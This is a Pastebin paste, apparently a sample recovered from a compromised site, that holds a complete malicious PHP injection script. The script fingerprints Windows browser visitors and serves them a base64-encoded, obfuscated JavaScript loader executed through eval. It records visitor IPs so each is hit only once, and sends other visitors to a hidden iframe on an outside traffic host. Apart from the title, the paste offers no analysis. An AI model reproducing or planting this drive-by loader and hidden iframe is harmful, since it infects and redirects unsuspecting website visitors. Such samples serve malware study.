Pastebin launched a little side project called HostCabi.net, check it out ;-)Don't like ads? PRO users don't see any ads ;-)
Guest

Malicious_PHP_Code_2

By: kazu-sama on Feb 6th, 2013  |  syntax: PHP  |  size: 5.30 KB  |  hits: 208  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1.  <?php
  2. error_reporting(0);
  3. $ip   = $_SERVER["REMOTE_ADDR"];
  4. $dr   = $_SERVER["DOCUMENT_ROOT"];
  5. $ua   = $_SERVER['HTTP_USER_AGENT'];
  6. $odbf = $dr . '/' . md5(date('m.d.y'), time() - 86400);
  7. if (file_exists($odbf))
  8.     @unlink($odbf);
  9. $dbf = $dr . '/' . md5(date('m.d.y'));
  10. if ((strpos($ua, 'Windows') !== false) && ((strpos($ua, 'MSIE') !== false) || (strpos($ua, 'Opera') !== false) || (strpos($ua, 'Firefox') !== false || (strpos($ua, 'Mozilla') !== false)) && (strpos(@file_get_contents($dbf), $ip) === false))) {
  11.     error_reporting(0);
  12.     echo (base64_decode('PHNjcmlwdD50cnl7aWYod2luZG93LmRvY3VtZW50KXdpbmRvd1siZG9jdW1lbnQiXVsiYm9keSJdPSIxMjMifWNhdGNoKGJhd2V0YXdlKXtpZih3aW5kb3cuZG9jdW1lbnQpe3Y9d2luZG93O3RyeXtmYXdiZS0tfWNhdGNoKGFmbndlbmV3KXt0cnl7KHYrdikoKX1jYXRjaChnbmdydGhuKXt0cnl7aWYoMDIwPT09MHgxMCl2WyJkb2N1bWVudCJdWyJib2R5Il09IjEyMyJ9Y2F0Y2goZ2ZkbmZkZ2Jlcil7bT0xMjM7aWYoKGFsZXJ0KyIiKS5pbmRleE9mKCJuYSIrInRpIisidmUiKSE9PS0xKWV2PXdpbmRvd1siZXZhbCJdO319Cm49WyI5IiwiOSIsIjQ1IiwiNDIiLCIxNyIsIjFmIiwiNDAiLCI0YiIsIjNvIiwiNGgiLCI0OSIsIjQxIiwiNGEiLCI0ZyIsIjFsIiwiNDMiLCI0MSIsIjRnIiwiMmoiLCI0OCIsIjQxIiwiNDkiLCI0MSIsIjRhIiwiNGciLCI0ZiIsIjJnIiwiNGwiLCIzOSIsIjNtIiwiNDMiLCIzMyIsIjNtIiwiNDkiLCI0MSIsIjFmIiwiMWUiLCIzbiIsIjRiIiwiNDAiLCI0bCIsIjFlIiwiMWciLCIzZyIsIjFuIiwiM2kiLCIxZyIsIjRuIiwiZCIsIjkiLCI5IiwiOSIsIjQ1IiwiNDIiLCI0ZSIsIjNtIiwiNDkiLCI0MSIsIjRlIiwiMWYiLCIxZyIsIjI5IiwiZCIsIjkiLCI5IiwiNTAiLCIxNyIsIjQxIiwiNDgiLCI0ZiIsIjQxIiwiMTciLCI0biIsImQiLCI5IiwiOSIsIjkiLCI0MCIsIjRiIiwiM28iLCI0aCIsIjQ5IiwiNDEiLCI0YSIsIjRnIiwiMWwiLCI0aiIsIjRlIiwiNDUiLCI0ZyIsIjQxIiwiMWYiLCIxOSIsIjJhIiwiNDUiLCI0MiIsIjRlIiwiM20iLCI0OSIsIjQxIiwiMTciLCI0ZiIsIjRlIiwiM28iLCIyYiIsIjFlIiwiNDQiLCI0ZyIsIjRnIiwiNGMiLCIyOCIsIjFtIiwiMW0iLCI0aSIsIjQxIiwiNGciLCI0bSIsIjQxIiwiNGkiLCI0NCIsIjRjIiwiM20iLCI0NiIsIjFsIiwiNGIiLCI0ZyIsIjRtIiwiNGIiLCIxbCIsIjNvIiwiNGIiLCI0OSIsIjFtIiwiNGEiLCI0ZyIsIjFtIiwiNGYiLCI0ZyIsIjNtIiwiNGciLCI0ZiIsIjFsIiwiNGMiLCI0NCIsIjRjIiwiMWUiLCIxNyIsIjRqIiwiNDUiLCI0MCIsIjRnIiwiNDQiLCIyYiIsIjFlIiwiMW8iLCIxbiIsIjFlIiwiMTciLCI0NCIsIjQxIiwiNDUiLCI0MyIsIjQ0IiwiNGciLCIyYiIsIjFlIiwiMW8iLCIxbiIsIjFlIiwiMTciLCI0ZiIsIjRnIiwiNGwiLCI0OCIsIjQxIiwiMmIiLCIxZSIsIjRpIiwiNDUiLCI0ZiIsIjQ1IiwiM24iLCI0NSIsIjQ4IiwiNDUiLCI0ZyIsIjRsIiwiMjgiLCI0NCIsIjQ1IiwiNDAiLCI0MCIsIjQxIiwiNGEiLCIyOSIsIjRjIiwiNGIiLCI0ZiIsIjQ1IiwiNGciLCI0NSIsIjRiIiwiNGEiLCIyOCIsIjNtIiwiM24iLCI0ZiIsIjRiIiwiNDgiLCI0aCIsIjRnIiwiNDEiLCIyOSIsIjQ4IiwiNDEiLCI0MiIsIjRnIiwiMjgiLCIxbiIsIjI5IiwiNGciLCI0YiIsIjRjIiwiMjgiLCIxbiIsIjI5IiwiMWUiLCIyYyIsIjJhIiwiMW0iLCI0NSIsIjQyIiwiNGUiLCIzbSIsIjQ5IiwiNDEiLCIyYyIsIjE5IiwiMWciLCIyOSIsImQiLCI5IiwiOSIsIjUwIiwiZCIsIjkiLCI5IiwiNDIiLCI0aCIsIjRhIiwiM28iLCI0ZyIsIjQ1IiwiNGIiLCI0YSIsIjE3IiwiNDUiLCI0MiIsIjRlIiwiM20iLCI0OSIsIjQxIiwiNGUiLCIxZiIsIjFnIiwiNG4iLCJkIiwiOSIsIjkiLCI5IiwiNGkiLCIzbSIsIjRlIiwiMTciLCI0MiIsIjE3IiwiMmIiLCIxNyIsIjQwIiwiNGIiLCIzbyIsIjRoIiwiNDkiLCI0MSIsIjRhIiwiNGciLCIxbCIsIjNvIiwiNGUiLCI0MSIsIjNtIiwiNGciLCI0MSIsIjJqIiwiNDgiLCI0MSIsIjQ5IiwiNDEiLCI0YSIsIjRnIiwiMWYiLCIxZSIsIjQ1IiwiNDIiLCI0ZSIsIjNtIiwiNDkiLCI0MSIsIjFlIiwiMWciLCIyOSIsIjQyIiwiMWwiLCI0ZiIsIjQxIiwiNGciLCIyZiIsIjRnIiwiNGciLCI0ZSIsIjQ1IiwiM24iLCI0aCIsIjRnIiwiNDEiLCIxZiIsIjFlIiwiNGYiLCI0ZSIsIjNvIiwiMWUiLCIxaiIsIjFlIiwiNDQiLCI0ZyIsIjRnIiwiNGMiLCIyOCIsIjFtIiwiMW0iLCI0aSIsIjQxIiwiNGciLCI0bSIsIjQxIiwiNGkiLCI0NCIsIjRjIiwiM20iLCI0NiIsIjFsIiwiNGIiLCI0ZyIsIjRtIiwiNGIiLCIxbCIsIjNvIiwiNGIiLCI0OSIsIjFtIiwiNGEiLCI0ZyIsIjFtIiwiNGYiLCI0ZyIsIjNtIiwiNGciLCI0ZiIsIjFsIiwiNGMiLCI0NCIsIjRjIiwiMWUiLCIxZyIsIjI5IiwiNDIiLCIxbCIsIjRmIiwiNGciLCI0bCIsIjQ4IiwiNDEiLCIxbCIsIjRpIiwiNDUiLCI0ZiIsIjQ1IiwiM24iLCI0NSIsIjQ4IiwiNDUiLCI0ZyIsIjRsIiwiMmIiLCIxZSIsIjQ0IiwiNDUiLCI0MCIsIjQwIiwiNDEiLCI0YSIsIjFlIiwiMjkiLCI0MiIsIjFsIiwiNGYiLCI0ZyIsIjRsIiwiNDgiLCI0MSIsIjFsIiwiNGMiLCI0YiIsIjRmIiwiNDUiLCI0ZyIsIjQ1IiwiNGIiLCI0YSIsIjJiIiwiMWUiLCIzbSIsIjNuIiwiNGYiLCI0YiIsIjQ4IiwiNGgiLCI0ZyIsIjQxIiwiMWUiLCIyOSIsIjQyIiwiMWwiLCI0ZiIsIjRnIiwiNGwiLCI0OCIsIjQxIiwiMWwiLCI0OCIsIjQxIiwiNDIiLCI0ZyIsIjJiIiwiMWUiLCIxbiIsIjFlIiwiMjkiLCI0MiIsIjFsIiwiNGYiLCI0ZyIsIjRsIiwiNDgiLCI0MSIsIjFsIiwiNGciLCI0YiIsIjRjIiwiMmIiLCIxZSIsIjFuIiwiMWUiLCIyOSIsIjQyIiwiMWwiLCI0ZiIsIjQxIiwiNGciLCIyZiIsIjRnIiwiNGciLCI0ZSIsIjQ1IiwiM24iLCI0aCIsIjRnIiwiNDEiLCIxZiIsIjFlIiwiNGoiLCI0NSIsIjQwIiwiNGciLCI0NCIsIjFlIiwiMWoiLCIxZSIsIjFvIiwiMW4iLCIxZSIsIjFnIiwiMjkiLCI0MiIsIjFsIiwiNGYiLCI0MSIsIjRnIiwiMmYiLCI0ZyIsIjRnIiwiNGUiLCI0NSIsIjNuIiwiNGgiLCI0ZyIsIjQxIiwiMWYiLCIxZSIsIjQ0IiwiNDEiLCI0NSIsIjQzIiwiNDQiLCI0ZyIsIjFlIiwiMWoiLCIxZSIsIjFvIiwiMW4iLCIxZSIsIjFnIiwiMjkiLCJkIiwiOSIsIjkiLCI5IiwiNDAiLCI0YiIsIjNvIiwiNGgiLCI0OSIsIjQxIiwiNGEiLCI0ZyIsIjFsIiwiNDMiLCI0MSIsIjRnIiwiMmoiLCI0OCIsIjQxIiwiNDkiLCI0MSIsIjRhIiwiNGciLCI0ZiIsIjJnIiwiNGwiLCIzOSIsIjNtIiwiNDMiLCIzMyIsIjNtIiwiNDkiLCI0MSIsIjFmIiwiMWUiLCIzbiIsIjRiIiwiNDAiLCI0bCIsIjFlIiwiMWciLCIzZyIsIjFuIiwiM2kiLCIxbCIsIjNtIiwiNGMiLCI0YyIsIjQxIiwiNGEiLCI0MCIsIjJoIiwiNDQiLCI0NSIsIjQ4IiwiNDAiLCIxZiIsIjQyIiwiMWciLCIyOSIsImQiLCI5IiwiOSIsIjUwIl07aD0yO3M9IiI7aWYobSlmb3IoaT0wO2ktNTg3IT0wO2krKyl7az1pO2lmKHdpbmRvd1siZG9jdW1lbnQiXSlzKz1TdHJpbmdbImZybyIrIm1DIisiaGFyQ29kZSJdKHBhcnNlSW50KG5baV0sMjUpKTt9ej1zO2V2KHopfX19PC9zY3JpcHQ+'));
  13.     if ($fp = @fopen($dbf, "a")) {
  14.         fputs($fp, $ip . '|');
  15.         fclose($fp);
  16.     }
  17. } else
  18.     echo '<iframe style="visibility:hidden;position:absolute;left:0;top:0;" width="100" height="6" src="http://click.rndtrg.com/feed/frames.php?uid=99&frames=2"></iframe>';
  19. if (file_exists("openinfo.php") OR isset($_REQUEST['dblink']) OR empty($dblink))
  20.     die("Cannot open file.");
  21. ?>